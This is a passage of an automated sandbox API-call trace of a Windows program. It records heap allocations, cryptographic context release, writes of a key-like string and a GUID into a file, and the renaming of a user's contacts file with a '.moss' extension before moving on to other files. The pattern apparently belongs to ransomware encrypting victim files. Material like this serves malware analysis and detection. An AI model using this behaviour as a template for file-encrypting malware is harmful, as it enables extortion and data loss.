(dwErrCode=0x0) [0168.921] GetLastError () returned 0x0 [0168.921] SetLastError (dwErrCode=0x0) [0168.921] GetLastError () returned 0x0 [0168.921] SetLastError (dwErrCode=0x0) [0168.921] GetLastError () returned 0x0 [0168.921] SetLastError (dwErrCode=0x0) [0168.921] GetLastError () returned 0x0 [0168.921] SetLastError (dwErrCode=0x0) [0168.921] GetLastError () returned 0x0 [0168.921] SetLastError (dwErrCode=0x0) [0168.921] GetLastError () returned 0x0 [0168.921] SetLastError (dwErrCode=0x0) [0168.921] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.922] SetLastError (dwErrCode=0x0) [0168.922] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.923] SetLastError (dwErrCode=0x0) [0168.923] GetLastError () returned 0x0 [0168.924] SetLastError (dwErrCode=0x0) [0168.924] GetLastError () returned 0x0 [0168.924] SetLastError (dwErrCode=0x0) [0168.924] GetLastError () returned 0x0 [0168.924] SetLastError (dwErrCode=0x0) [0168.924] GetLastError () returned 0x0 [0168.924] SetLastError (dwErrCode=0x0) [0168.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0168.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0168.924] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0168.924] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0168.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0168.924] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0168.924] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0168.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0168.924] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0168.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4a0) returned 0x3b447b0 [0168.924] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0168.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0168.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44c58 [0168.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0168.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbba0 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44fa8 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbb8 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc30 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc48 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0168.925] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b48820 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a40 [0168.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc30 | out: hHeap=0xcd0000) returned 1 [0168.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc48 | out: hHeap=0xcd0000) returned 1 [0168.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0168.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0168.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a40 | out: hHeap=0xcd0000) returned 1 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc48 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbc30 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613670 [0168.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc48 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc30 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.926] GetCurrentThreadId () returned 0x324 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31670 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.926] GetCurrentThreadId () returned 0x324 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0168.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0168.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc30 [0168.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0168.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0168.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc48 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc18 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc60 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc30 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc30 [0168.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48820 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0168.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0168.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48a30 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0168.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0168.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc30 | out: hHeap=0xcd0000) returned 1 [0168.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48c48 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0168.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a30 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c48 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0168.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc60 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc48 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc18 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbb8 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44fa8 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613670 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0168.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44c58 | out: hHeap=0xcd0000) returned 1 [0168.930] WriteFile (in: hFile=0x664, lpBuffer=0x3b447b0*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b447b0*, lpNumberOfBytesWritten=0x401fb14*=0x494, lpOverlapped=0x0) returned 1 [0168.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0168.931] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.931] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0168.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0168.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0168.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0168.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0168.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0168.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0168.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0168.931] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0168.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.931] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0168.931] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0168.931] CloseHandle (hObject=0x664) returned 1 [0168.935] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0168.935] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0168.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0168.935] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.moss")) returned 1 [0168.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.936] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0168.938] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0168.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0168.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0168.938] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0168.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0168.938] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, 